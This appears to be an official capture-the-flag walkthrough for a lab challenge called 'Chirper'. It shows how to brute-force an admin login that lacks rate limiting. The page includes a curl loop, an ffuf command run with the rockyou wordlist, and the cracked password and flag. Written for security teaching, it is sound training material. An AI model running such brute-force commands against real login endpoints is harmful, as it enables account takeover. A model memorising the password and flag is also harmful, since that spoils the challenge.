HACKR.GG
hackr.gg — Sign In — Chirper Walkthrough
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

Sign In — Chirper

Broken Authentication · Brute Force / Missing Rate Limiting
Difficulty
Intermediate
Vuln class
Brute Force / Missing Rate Limiting
Steps
5
// Objective
Brute-force the Chirper admin account password using ffuf or hydra. The login endpoint has no rate limiting, no account lockout, and no CAPTCHA.
// Tools required
ffufhydracurlBrowser
// Step-by-step walkthrough
1
Identify the login endpoint
Open the Chirper login page and submit a test login. Observe the request in DevTools — note the endpoint, method, and body format.
Command / Input
POST /api/login Content-Type: application/json {"username":"admin","password":"wrongpassword"}
Output
{"error":"Invalid credentials"}
2
Confirm no rate limiting
Send the same failing request 10 times in rapid succession. If you don't receive a 429 or get locked out, the endpoint is brute-forceable.
Command / Input
for i in {1..10}; do curl -s -X POST /api/login -d '{"username":"admin","password":"test"}'; done
Output
{"error":"Invalid credentials"} x10 — no lockout, no slowdown.
A hardened login would return 429 after 5 failures, or require a CAPTCHA, or add exponential delay.
3
Run ffuf against the password field
Use ffuf with a common password wordlist. Filter out the "Invalid credentials" response by its size so only a successful login shows up.
Command / Input
ffuf -u http://target.lab/api/login \ -X POST \ -H "Content-Type: application/json" \ -d '{"username":"admin","password":"FUZZ"}' \ -w /usr/share/wordlists/rockyou.txt \ -fs 26
Output
[Status: 200, Size: 112] chirp123
-fs 26 filters responses with 26 bytes (the size of the error message). A different size means success.
4
Log in as admin
Use the discovered password to log in through the normal login form.
Command / Input
Username: admin Password: chirp123
5
Retrieve the flag from the admin dashboard
Once logged in as admin, navigate to the dashboard. The flag is displayed in the admin panel.
Output
HackrGG{br0k3n_4uth_r4t3_l1m1t_byp4ss}
// Flag
Flag value
HackrGG{br0k3n_4uth_r4t3_l1m1t_byp4ss}
Visible in the Chirper admin dashboard after logging in with the brute-forced password.
hackr.gg · Cybersecurity Education PlatformEducational use only · Do not distribute